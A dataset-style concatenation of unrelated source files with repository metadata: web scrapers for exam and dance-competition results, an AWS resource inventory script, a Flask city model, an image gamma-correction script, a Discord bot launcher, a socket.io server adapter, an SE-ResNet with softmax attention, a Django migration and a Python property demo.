        try:
            # CGPA cell lives in row 5, column 2 of the grade table.
            obtained_marks = int(sgpa_table.findAll('tr')[4].findAll('td')[1].text)
            total_marks = 5
            FINAL_CGPA = (obtained_marks)/total_marks
            print([VAR_rollno, VAR_sname, FINAL_CGPA, VAR_college])
        except IndexError:
            continue
        college_sgpa_list.append([VAR_rollno, VAR_sname, FINAL_CGPA, VAR_college])
    # NOTE(review): bare `exit` is a no-op — it evaluates the builtin without
    # calling it; likely leftover debug code (exit() would stop the script).
    exit
# Rank all collected results by CGPA, highest first.
college_sgpa_list.sort(key = lambda x : x[2], reverse=True)
# print(college_sgpa_list)
# print to file
with open('DU-PG-MCA-2019-4th-sem.txt','w') as f:
    print('{3:<5} {0:15} {1:25} {2:10} {4:<40}'.format("Roll No.","Name","Sem-IV","S.No", "College"), file=f)
    for i,marks in enumerate(college_sgpa_list):
        print('{3:<5} {0:15} {1:25} {2:<10} {4:<40}'.format(marks[0],marks[1],marks[2], i+1, marks[3]), file=f)
# CSV print to file
with open('DU-PG-MCA-2019-4th-sem.csv.txt','w') as f:
    print('{3:<5} ,{0:15} ,{1:25} ,{2:10} ,{4:<40}'.format("Roll No.","Name","Sem-IV","S.No", "College"), file=f)
    for i,marks in enumerate(college_sgpa_list):
        print('{3:<5} ,{0:15} ,{1:25} ,{2:<10} ,{4:<40}'.format(marks[0],marks[1],marks[2], i+1, marks[3]), file=f)
# print(soup.prettify())
# with open("test.html", "w") as file:
# file.write(str(soup))
| [
"jatin.mca17.du@gmail.com"
] | jatin.mca17.du@gmail.com |
7644d77665604f354af3eb7792920e24a0cf8178 | 1b48f6f17790b7498046c53f646e0548846a7074 | /feisresults/spiders/feisresults_spider.py | b143a697aa167f6898ccba7325d26a44e53fcdc0 | [] | no_license | jonpresley/feisresults | b14ac62d87183d3e3155541cfe83ef14f2901c21 | aaf56fa6e83872b926f94301882429fd5bb6a8fb | refs/heads/master | 2020-05-16T08:14:32.068426 | 2019-04-24T20:56:38 | 2019-04-24T20:56:38 | 182,902,552 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,537 | py | from scrapy import Spider, Request
from feisresults.items import FeisresultsItem
import re
class FeisresultsSpider(Spider):
    """Crawl feisresults.com and yield one FeisresultsItem per dancer result.

    Crawl order: year index pages -> individual feis pages -> competition
    result pages, where the per-dancer rows are parsed.
    """
    name = 'feisresults_spider'
    # NOTE(review): scrapy's filtering attribute is `allowed_domains`;
    # `allowed_urls` is ignored by the framework — confirm intent.
    allowed_urls = ['https://www.feisresults.com/']
    start_urls = ['http://www.feisresults.com/results1.php']

    def parse(self, response):
        """Fan out one request per posted result year (2019 down to 2008)."""
        # years posted on website
        result_years_lst = list(range(2019,2007,-1))
        # List comprehension to construct all the urls for the years
        result_years_urls = ['http://www.feisresults.com/results1.php?year={}'.format(x) for x in result_years_lst]
        print('level 1')
        for url in result_years_urls[:]:
            print(url)
            yield Request(url=url, callback=self.parse_year_page)

    def parse_year_page(self, response):
        """On a year page: follow every feis listed for that year."""
        feis_urls = response.xpath('//*[@id="box1"]/p[3]/a/@href').extract()
        print('level 2')
        for url in feis_urls:
            print(url)
            yield Request(url='http://www.feisresults.com/'+url, callback=self.parse_feis_page)

    def parse_feis_page(self, response):
        """On a feis page: follow every competition listed in the sidebar."""
        comp_urls = response.xpath('//*[@id="sidebar1"]/p/a/@href').extract()
        print('level 3')
        for url in comp_urls:
            print('http://www.feisresults.com/'+url)
            yield Request(url='http://www.feisresults.com/'+url, callback=self.parse_comp_page)

    def parse_comp_page(self, response):
        """Parse a competition results table into FeisresultsItem objects."""
        feis_yr = response.xpath('//span[@class="bluetext"]/text()').extract_first()
        date = response.xpath('//span[@class="bluetext"]/text()[2]').extract_first()
        year = date.split()[-1]
        # Feis name is everything except the trailing year token.
        feis = ' '.join(feis_yr.split()[:-1])
        comp_name_ugly = response.xpath('//*[@id="box1"]/h3/text()').extract_first()
        wq_wmh_str = response.xpath('//*[@id="box1"]/h3/span/text()').extract_first()
        competition = ' '.join(comp_name_ugly.split(' ')[3:]).strip()
        # Robustness: the qualifier/world-medal note is absent on some pages.
        wq_wmh_lower = (wq_wmh_str or '').lower()
        # Matches alphanumerics, hyphens, spaces, apostrophes plus unicode for
        # special letters. Compiled once, outside the per-row loop.
        name_pattern = re.compile("[ \-'\w\u00C0-\u00FF]+")
        dancer_rows = response.xpath('//table/tr')
        for dancer in dancer_rows[1:]:  # skip the header row
            name_wq_wmh = dancer.xpath('.//td[2]/text()').extract_first()
            school_region = dancer.xpath('.//td[3]/text()').extract_first()
            place = dancer.xpath('.//td[4]/text()').extract_first()
            name = name_pattern.findall(name_wq_wmh)[0].strip()
            # BUG FIX: the original tested ('*' or '+') in s, which always
            # reduces to '*' in s and never detects a '+' marker.
            has_marker = ('*' in name_wq_wmh) or ('+' in name_wq_wmh)
            if has_marker and ('world medal' in wq_wmh_lower):
                # Marked dancer in a world-medal competition.
                wq = 1
                wmh = 1
            elif has_marker and ('qualifier' in wq_wmh_lower):
                # Marked dancer in a qualifier competition.
                wq = 1
                wmh = 0
            elif (not has_marker) and ('world medal' in wq_wmh_lower):
                wq = 1
                wmh = 0
            else:
                wq = 0
                wmh = 0
            if ':' in school_region:
                school = school_region.split(':')[0].strip()
                region = school_region.split(':')[1].strip()
            else:
                school = school_region
                # Derive the region from the feis name for Oireachtas events.
                region = ' '.join(feis.split()[:-1]).replace('Oireachtas','').replace('Rince','').strip()
            item = FeisresultsItem()
            item['feis'] = feis
            item['date'] = date
            item['year'] = year
            item['name'] = name
            item['school'] = school
            item['region'] = region
            item['place'] = place
            item['competition'] = competition
            item['wq'] = wq
            item['wmh'] = wmh
            # TODO (original note): derive gender and solo/group/championship
            # categories here or in post-scraping processing; also fetch
            # secondary/primary competitions not listed on these pages.
            yield item
| [
"jonpresley@hotmail.com"
] | jonpresley@hotmail.com |
e4e76f59e2049ab070cf7cb4ab17e73d3742e4e4 | 3f9e05507195af59b44be45b5a600e56d6ccccf9 | /lucidchartmapper.py | f2f3a98bf471c9bd564e2e6d71b22a7243a4096c | [] | no_license | jonathanbglass/tips_n_tricks | d78ab5d9c736d998a4e985787a12987a46dec374 | dffcfeeeabab0f4b8c95505effef514fd6c64d53 | refs/heads/master | 2023-06-08T07:18:33.448678 | 2023-06-01T12:58:20 | 2023-06-01T12:58:20 | 187,048,486 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,538 | py | #!/usr/bin/env python2
import botocore.session
from datetime import datetime, tzinfo, timedelta
import json
from os import environ
#change region to match desired region
region = 'us-east-1'
class SimpleUtc(tzinfo):
    """Minimal fixed-offset tzinfo representing UTC."""

    def tzname(self, dt):
        # BUG FIX: tzinfo.tzname() receives the datetime as an argument; the
        # original signature omitted it and raised TypeError when called.
        return "UTC"

    def utcoffset(self, dt):
        # UTC is zero offset from UTC.
        return timedelta(0)
class DateTimeEncoder(json.JSONEncoder):
    """JSON encoder that serialises datetime objects as ISO-8601 strings."""

    def default(self, o):
        if isinstance(o, datetime):
            # BUG FIX: the original called o.utcnow(), which ignores `o` and
            # returns the *current* time, so every datetime serialised as
            # "now". Serialise the actual value instead.
            return o.isoformat()
        # Fall back to the base class for unsupported types (raises TypeError).
        return json.JSONEncoder.default(self, o)
def clean_response(resp):
    """Strip AWS's per-call 'ResponseMetadata' entry from *resp* and return it.

    Mutates *resp* in place. Robustness: tolerates responses that lack the
    key (the original `del` raised KeyError in that case).
    """
    resp.pop('ResponseMetadata', None)
    return resp
output = {}
if 'AWS_PROFILE' in environ:
session = botocore.session.Session(profile=environ['AWS_PROFILE'])
else:
session = botocore.session.get_session()
ec2 = session.create_client('ec2', region_name=region)
myregions = [thisregion['RegionName'] for thisregion in ec2.describe_regions()['Regions']]
print(myregions)
# Walk every region: snapshot the main service inventories into `output`,
# then dump one JSON file per region.
# NOTE(review): `output` is created once, before this loop, so data gathered
# in earlier regions carries over into later regions' dump files — confirm
# whether that accumulation is intended.
# NOTE(review): the bare `except: continue` blocks skip the rest of the
# region on *any* error (including KeyboardInterrupt) and hide the cause.
for region in myregions:
    print("Checking Region: " + region)
    try:
        ec2 = session.create_client('ec2', region_name=region)
    except:
        continue
    print("Executing ec2 describe-instances")
    try:
        output['ec2'] = clean_response(ec2.describe_instances())
    except:
        continue
    print("Executing ec2 describe-security-groups")
    try:
        output['securitygroup'] = clean_response(ec2.describe_security_groups())
    except:
        continue
    print("Executing ec2 describe-subnet")
    try:
        output['subnets'] = clean_response(ec2.describe_subnets())
    except:
        continue
    print("Executing ec2 describe-network-acls")
    try:
        output['acls'] = clean_response(ec2.describe_network_acls())
    except:
        continue
    print("Executing ec2 describe-vpcs")
    try:
        output['vpc'] = clean_response(ec2.describe_vpcs())
    except:
        continue
    print("Executing ec2 describe-volumes")
    try:
        output['ebs'] = clean_response(ec2.describe_volumes())
    except:
        continue
    print("Executing elb describe-load-balancers")
    try:
        output['elb'] = clean_response(session.create_client('elb', region_name=region).describe_load_balancers())
    except:
        continue
    try:
        elbv2 = session.create_client('elbv2', region_name=region)
    except:
        continue
    output['elbv2'] = {}
    output['elbv2']['TargetHealthDescriptions'] = {}
    print("Executing elbv2 describe-load-balancers")
    try:
        output['elbv2']['LoadBalancers'] = elbv2.describe_load_balancers()['LoadBalancers']
    except:
        continue
    print("Executing elbv2 describe-target-groups")
    try:
        output['elbv2']['TargetGroups'] = elbv2.describe_target_groups()['TargetGroups']
    except:
        continue
    print("Executing elbv2 describe-target-health")
    # One health lookup per target group ARN discovered above.
    for target_group_arn in [target_group['TargetGroupArn'] for target_group in output['elbv2']['TargetGroups']]:
        try:
            output['elbv2']['TargetHealthDescriptions'][target_group_arn] = elbv2.describe_target_health(TargetGroupArn=target_group_arn)['TargetHealthDescriptions']
        except:
            continue
    print("Executing autoscaling describe-auto-scaling-groups")
    try:
        output['autoscale'] = clean_response(session.create_client('autoscaling', region_name=region).describe_auto_scaling_groups())
    except:
        continue
    print("Executing autoscaling describe-launch-configurations")
    try:
        output['launchconfig'] = clean_response(session.create_client('autoscaling', region_name=region).describe_launch_configurations())
    except:
        continue
    print("Executing s3api list-buckets")
    try:
        output['s3buckets'] = clean_response(session.create_client('s3', region_name=region).list_buckets())
    except:
        continue
    print("Executing rds describe-db-instances")
    try:
        output['rds'] = clean_response(session.create_client('rds', region_name=region).describe_db_instances())
    except:
        continue
    # (Message below is mislabelled; this call lists CloudFront distributions.)
    print("Executing cloudfront describe-db-instances")
    try:
        output['cloudfront'] = clean_response(session.create_client('cloudfront', region_name=region).list_distributions())
    except:
        continue
    print("Executing sns list-topics")
    try:
        sns = session.create_client('sns', region_name=region)
    except:
        continue
    try:
        topic_resp = sns.list_topics()
    except:
        continue
    print("Executing sns get-topic-attributes")
    try:
        output['sns'] = [clean_response(sns.get_topic_attributes(TopicArn = t['TopicArn'])) for t in topic_resp.get('Topics',[])]
    except:
        continue
    print("Executing sqs list-queues")
    try:
        sqs = session.create_client('sqs', region_name=region)
    except:
        continue
    try:
        queue_resp = sqs.list_queues()
    except:
        continue
    print("Executing sqs get-queue-attributes")
    try:
        urls = queue_resp.get('QueueUrls',[])
    except:
        continue
    try:
        output['sqs'] = {'Queues': [clean_response(sqs.get_queue_attributes(AttributeNames=['All'], QueueUrl = url)) for url in urls]}
    except:
        continue
    output['importMetaData'] = {'region': region, 'timeStamp': datetime.now()}
    # One output file per region (prefixed with the profile name when set).
    if 'AWS_PROFILE' in environ:
        outfile = environ['AWS_PROFILE'] + "-" + region + '-aws.json'
    else:
        outfile = 'aws.json'
    with open(outfile, 'w') as f:
        json.dump(output, f, cls=DateTimeEncoder)
    print("Output to " + outfile)
| [
"noreply@github.com"
] | jonathanbglass.noreply@github.com |
338112d113012bad8d01d8131743534483bf7067 | d32ef9fe4d58d873f6752f5c20c205682b7ac25a | /config/nvim/rplugin/python/log.py | 0bb616eea9ba46f4584b6100e315ebb564420547 | [] | no_license | alexeRadu/dotfiles | 555705fbfeabff5b4cd351df77aa5c4ca2161171 | ef86cc28841dbef27b0de5e6d7ed45f5cdd442cf | refs/heads/master | 2023-07-09T23:50:54.117391 | 2023-06-29T16:13:47 | 2023-06-29T16:13:47 | 94,201,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | import logging
def setup_logging():
    """Configure the 'dbug' logger: DEBUG level, writing to /tmp/dbug.log."""
    dbug_logger = logging.getLogger("dbug")
    file_handler = logging.FileHandler('/tmp/dbug.log', 'w')
    file_handler.setFormatter(
        logging.Formatter('%(msecs)6d %(levelname)-5s %(message)s'))
    dbug_logger.addHandler(file_handler)
    dbug_logger.setLevel(logging.DEBUG)
| [
"alexeRadu2007@gmail.com"
] | alexeRadu2007@gmail.com |
9f635f6fa32ef161386cd71ad13f0caeb9e69192 | 419d6346d722589ecff72a33f2431775f9bf3dfa | /sampleCode/sample8/cities.py | 8453e6fb5a1129f1be656645813d88e7dec5d11d | [] | no_license | wzmf038827/pythonFlask | dc414c37322ace036a1b9858ce5626a59dcbda4e | 216db3c846ecc7a49c7f3cc7d1b15d6d3be7905a | refs/heads/master | 2023-04-11T17:44:52.093854 | 2021-05-03T06:06:11 | 2021-05-03T06:06:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | import os
import sqlite3
from flask_sqlalchemy import SQLAlchemy
from main import app
# Open the raw sqlite database (citys.db) that sits next to this file and
# dump the `city` table once at import time.
basePath = os.path.abspath(os.path.dirname(__file__))
cityPath = os.path.join(basePath, 'citys.db')
conn = sqlite3.connect(cityPath)
print('開啟資料庫成功')  # "database opened successfully"
c = conn.cursor()
cursor = c.execute("select * from city")
print(cursor.__class__)
citys = list(cursor)
print("select 成功")  # "select succeeded"
conn.close()
# Point Flask-SQLAlchemy at a *different* sqlite file (citys.sqlite, not
# citys.db read above) — presumably intentional; confirm.
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basePath,'citys.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class City(db.Model):
    """SQLAlchemy model for one row of the `city` table."""
    __tablename__ = 'city'
    id = db.Column(db.Integer, primary_key=True)
    cityName = db.Column(db.String(64), unique=True)
    continent = db.Column(db.String(64), nullable=False)
    country = db.Column(db.String(64), nullable=False)
    # Image file name/path for the city (required).
    image = db.Column(db.String(64), nullable=False)
    description = db.Column(db.Text)
    # Geographic coordinates (latitude/longitude).
    lat = db.Column(db.Float, nullable=False)
    lon = db.Column(db.Float, nullable=False)
    url = db.Column(db.String(256))
def getAllCities():
    """Return every City row (the list is also printed, preserving the
    original debug side effect).

    Improvement: the original queried and printed but returned None, so
    callers could not use the result; returning the list is backward
    compatible for callers that ignored the return value.
    """
    cityList = City.query.all()
    print(cityList)
    return cityList
| [
"roberthsu2003@gmail.com"
] | roberthsu2003@gmail.com |
62fb1b678d57e03edcb9bcd14ab0a9da07e0aba3 | 014b6d3835623a67f99a1771848ddb6caed0e2be | /median_gamma.py | a105cfe37b0eaa5a15b1a98ebfa9bf91e6674cda | [] | no_license | alancarlosml/image-processing | 224e302a355edee1fe9d1bed9e989052e1675873 | 8c961a8df4c418f3df8a1e316874459cf19a95a4 | refs/heads/master | 2021-05-20T12:10:11.492535 | 2020-04-02T22:29:57 | 2020-04-02T22:29:57 | 252,289,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | from pathlib import Path
from os import walk
import numpy as np
import cv2
ABSOLUTE_PATH = Path.cwd()
print(ABSOLUTE_PATH)
def adjust_gamma(image, gamma=1.0):
# build a lookup table mapping the pixel values [0, 255] to
# their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
# apply gamma correction using the lookup table
return cv2.LUT(image, table)
files = []
for (dirpath, dirnames, filenames) in walk('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/'):
files.extend(filenames)
break
for f in files:
print('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/' + f)
image = cv2.imread('F:/Alan/Documentos/Doutorado/Retina/images/rgb/test/' + f)
# convert the YUV image back to RGB format
img_output = adjust_gamma(image, 0.5)
img_output = cv2.medianBlur(img_output, 5)
cv2.imwrite('F:/Alan/Documentos/Doutorado/Retina/images/median_gamma/test/' + f, img_output)
| [
"alancarlosml@gmail.com"
] | alancarlosml@gmail.com |
df079fe350a45a3d9ea55cd5f00955315a3cee40 | 13d2abaf860a27a51ed8b6748947b93b5f71772a | /run.py | 03aec13d10701b65d68e4b47cd2fda4bcf7d7451 | [
"MIT"
] | permissive | broden-wanner/party-parrot-bot | fc4c8acbd9b1649d23590c7c4bd411b380c9771b | c4733bec1794bd46ac6eac98c9131431363f096b | refs/heads/master | 2023-02-13T19:36:58.103136 | 2021-01-15T21:58:39 | 2021-01-15T21:58:39 | 327,184,940 | 1 | 0 | null | 2021-01-06T03:16:41 | 2021-01-06T03:07:31 | Python | UTF-8 | Python | false | false | 338 | py | import os, sys
from dotenv import load_dotenv
from client import bot
if __name__ == "__main__":
load_dotenv()
# Get the token
token = os.getenv('BOT_TOKEN')
if not token:
print("[ERROR] BOT_TOKEN environment variable not set. Add it do the .env file.")
sys.exit()
# Start the bot
bot.run(token)
| [
"broden.wanner@outlook.com"
] | broden.wanner@outlook.com |
a7c6313e7d96e4efb70302abea076553c2bc4427 | d9c1890cf137489fa24bf0419d565b1e1edbd2cd | /circus/web/server.py | 6d6a07d58bb2fade819c4a6daa5b3e13ab132590 | [
"MIT",
"Apache-2.0"
] | permissive | magopian/circus | 47f7b6fcab833eaec19af6e9822d769bc9dd5050 | e2eef7f008050c30e43d1a10d615dd920fb6583a | refs/heads/master | 2021-01-18T04:54:23.720743 | 2012-11-11T19:07:39 | 2012-11-11T19:07:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,207 | py | import socket
from bottle import ServerAdapter
class SocketIOServer(ServerAdapter):
def __init__(self, host='127.0.0.1', port=8080, **config):
super(SocketIOServer, self).__init__(host, port, **config)
self.fd = config.get('fd')
if self.fd is not None:
self.fd = int(self.fd)
def run(self, handler):
try:
from socketio.server import SocketIOServer
except ImportError:
raise ImportError('You need to install gevent_socketio')
from gevent import monkey
from gevent_zeromq import monkey_patch
monkey.patch_all()
monkey_patch()
namespace = self.options.get('namespace', 'socket.io')
policy_server = self.options.get('policy_server', False)
if self.fd is not None:
sock = socket.fromfd(self.fd, socket.AF_INET, socket.SOCK_STREAM)
else:
sock = (self.host, self.port)
socket_server = SocketIOServer(sock, handler,
namespace=namespace,
policy_server=policy_server)
handler.socket_server = socket_server
socket_server.serve_forever()
| [
"tarek@ziade.org"
] | tarek@ziade.org |
fab7ec97a4393796b4ff21c55db026627eb1fade | f88ede2dc00e6bdbbc2a62e77f3f05ceedbe37db | /Cifar100_Squishmoid/models/Softmax.py | 22644964cce15b496deb3ca0b945ed3a9455af9f | [] | no_license | maramc17/Squishmoid | 334c16983633349f628bc8d6064f481c92f34d19 | 4d1e9e60ddd2efd04d4ce849ea4a60d1cedba40c | refs/heads/master | 2020-06-23T02:06:59.350880 | 2019-07-29T18:34:58 | 2019-07-29T18:34:58 | 198,470,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,049 | py | '''Pre-activation ResNet in PyTorch.
Reference:
[1] Kaiming He, Xiangyu Zhang, Shaoqing Ren, Jian Sun
Identity Mappings in Deep Residual Networks. arXiv:1603.05027
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
__all__ = ['SoftmaxSEResNet50']
# enlarge is the alpha of the softmax function, hoping to have the same reaction as sigmoid.
class SoftmaxSELayer(nn.Module):
def __init__(self, channel, reduction=16,enlarge =1): #englarge = alpha = 1
super(SoftmaxSELayer, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.enlarge=enlarge
self.fc = nn.Sequential(
nn.Linear(channel, channel // reduction, bias=False),
nn.ReLU(inplace=True),
nn.Linear(channel // reduction, channel, bias=False)
)
def forward(self, x):
b, c, _, _ = x.size()
y = self.avg_pool(x).view(b, c)
# print((self.fc(100 * y) * c)[1, :])
y = (self.fc(y)*c).view(b, c, 1, 1)
y = F.softmax(y*self.enlarge, dim=1) # Softmax Activation Function.
return x * y.expand_as(x)
class PreActBlock(nn.Module):
'''Pre-activation version of the BasicBlock.'''
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(PreActBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.se = SoftmaxSELayer(planes*self.expansion)
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
out = F.relu(self.bn1(x))
shortcut = self.shortcut(out) if hasattr(self, 'shortcut') else x
out = self.conv1(out)
out = self.conv2(F.relu(self.bn2(out)))
# Add SE block
out = self.se(out)
out += shortcut
return out
class PreActBottleneck(nn.Module):
'''Pre-activation version of the original Bottleneck module.'''
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(PreActBottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=False)
self.se = SoftmaxSELayer(planes*self.expansion)
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False)
)
def forward(self, x):
out = F.relu(self.bn1(x))
shortcut = self.shortcut(out) if hasattr(self, 'shortcut') else x
out = self.conv1(out)
out = self.conv2(F.relu(self.bn2(out)))
out = self.conv3(F.relu(self.bn3(out)))
# Add SE block
out = self.se(out)
out += shortcut
return out
class PreActResNet(nn.Module):
def __init__(self, block, num_blocks, num_classes=1000,init_weights=True):
super(PreActResNet, self).__init__()
self.in_planes = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
self.linear = nn.Linear(512*block.expansion, num_classes)
if init_weights:
self._initialize_weights()
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
if hasattr(m, 'bias.data'):
m.bias.data.zero_()
def forward(self, x):
out = self.conv1(x)
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = self.layer4(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def SoftmaxSEResNet18(num_classes=1000):
return PreActResNet(PreActBlock, [2,2,2,2],num_classes)
def SoftmaxSEResNet34(num_classes=1000):
return PreActResNet(PreActBlock, [3,4,6,3],num_classes)
def SoftmaxSEResNet50(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,4,6,3],num_classes)
def SoftmaxSEResNet101(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,4,23,3],num_classes)
def SoftmaxSEResNet152(num_classes=1000):
return PreActResNet(PreActBottleneck, [3,8,36,3],num_classes)
def test():
net = SoftmaxSEResNet50(num_classes=100)
y = net((torch.randn(10,3,32,32)))
print(y.size())
# test()
| [
"noreply@github.com"
] | maramc17.noreply@github.com |
534235bc309bf3d8aaee107daaf7605b10a93c80 | e29a67d4c67d81a90947934f795c1c4a1b6fc74d | /nikhil_chavan_prediction_model_task_5.py | 1217c0679ce764c1afcf4e2ae372d194a0d12607 | [] | no_license | Tinkerers-Lab-VESIT-ETRX/IoT-based-noise-pollution-monitoring-system-8 | 50a2b574fb0fd382615c781cb657b974cea72276 | 32ffa0c6e1567d434dda090345da2f82954a0b4e | refs/heads/main | 2023-06-11T16:07:26.730560 | 2021-07-12T18:18:12 | 2021-07-12T18:18:12 | 384,758,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,176 | py | # -*- coding: utf-8 -*-
"""Nikhil chavan Prediction Model Task 5.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1Q18MKd6G7NIH0g2KbK9XTW5WpVabBksK
"""
from google.colab import drive
drive.mount ('/content/drive/')
!pip install -q keras
import keras
import pandas as pd
import numpy as np
# Commented out IPython magic to ensure Python compatibility.
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
df=pd.read_csv('/content/drive/MyDrive/city_data.csv')
df.head(5)
df.info()
df.describe()
#CORRELATION_ANALYSIS
sns.heatmap(df.corr(),annot=True)
d=df.groupby(['City'])[['AQI']].mean().sort_values(by='AQI',ascending=False).head(10)
newdf=d.reset_index('City')
newdf
plt.figure(figsize=(10,5))
sns.barplot(data=newdf,x='AQI',y='City',orient='h',palette='viridis')
ndf = df.head(10)
n=ndf.dropna(axis=1)
ndf=n.drop('Date',axis=1)
nndf=ndf.drop('City',axis=1)
nndf
sns.pairplot(nndf)
df.columns
df['Year'] = pd.DatetimeIndex(df['Date']).year
df['Month'] = pd.DatetimeIndex(df['Date']).month
ddf=df.groupby(['City','Year','Month'])[['PM2.5','PM10','NOx','CO','NH3','O3','SO2','Benzene','Toluene','Xylene','AQI']].mean()
ndf=ddf.reset_index(['City','Year','Month'])
ndf.head
"""**Model**"""
X=nndf[[ 'NOx', 'SO2','O3', 'Benzene', 'Toluene', 'Xylene']]
y=ndf['AQI'].head(10)
"""**Train and Test**"""
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=101)
from sklearn.linear_model import LinearRegression
lm=LinearRegression()
lm.fit(X_train,y_train)
LinearRegression(copy_X=True, fit_intercept=True, n_jobs=None, normalize=False)
print(lm.intercept_)
lm.coef_
cdf=pd.DataFrame(lm.coef_,X.columns,columns=['Coeff'])
cdf
"""**Prediction**"""
predictions=lm.predict(X_test)
predictions
plt.scatter(y_test,predictions)
sns.distplot((y_test-predictions))
from sklearn import metrics
metrics.mean_absolute_error(y_test,predictions)
metrics.mean_squared_error(y_test,predictions)
np.sqrt(metrics.mean_squared_error(y_test,predictions))
"""**prediction task done**""" | [
"noreply@github.com"
] | Tinkerers-Lab-VESIT-ETRX.noreply@github.com |
4d952b651224199a592af47dc19fd9166eb94aa9 | 6e12c2e6d453ea1caf64c0eafaf3410b30f434e0 | /shop/migrations/0011_auto_20160607_1347.py | b6dc57869b17135e8c679bb3ac3d6d5cf83edca0 | [] | no_license | andreynovikov/django-shop | 43b66ec639037473cd72f7480f83811d911104fb | 8f843b0b15354903a335c324daa65714bfb2f8cc | refs/heads/master | 2023-04-28T01:26:16.938227 | 2023-04-22T15:33:29 | 2023-04-22T15:33:29 | 43,815,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,046 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('shop', '0010_manufacturer'),
]
operations = [
migrations.CreateModel(
name='Supplier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),
('name', models.CharField(verbose_name='название', max_length=100)),
],
options={
'verbose_name_plural': 'поставщики',
'verbose_name': 'поставщик',
},
),
migrations.AddField(
model_name='product',
name='manufacturer',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='shop.Manufacturer', verbose_name='Производитель', default=1),
preserve_default=False,
),
]
| [
"novikov@gmail.com"
] | novikov@gmail.com |
2ac600a2afbfa47e0fa79b2eb57c8e35a54d8048 | 2f6032d7f191b71f93f4bc178a2e753870e54ffd | /chapter6-类和对象/demo10-property装饰器.py | c1492f101fa248d130bb78134038f1d39c5a9773 | [] | no_license | mapleinsss/python-basic | 35606cbf4acbe49cbba8cf84caab2213c53da8a1 | 4d264694e3eda1d000626f4a47805cacbea12086 | refs/heads/master | 2023-01-14T01:36:38.673143 | 2020-11-24T15:36:58 | 2020-11-24T15:36:58 | 309,705,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | class Cell:
# 用 @property 修饰方法,相当于为该属性设置 getter 方法
@property
def state(self):
return self._state
@state.setter
def state(self, value):
if 'alive' in value.lower():
self._state = 'alive'
else:
self._state = 'dead'
@property
def is_dead(self):
return not self._state.lower() == 'alive'
c = Cell()
c.state = 'Alive'
print(c.state)
print(c.is_dead)
| [
"mapleins@aliyun.com"
] | mapleins@aliyun.com |
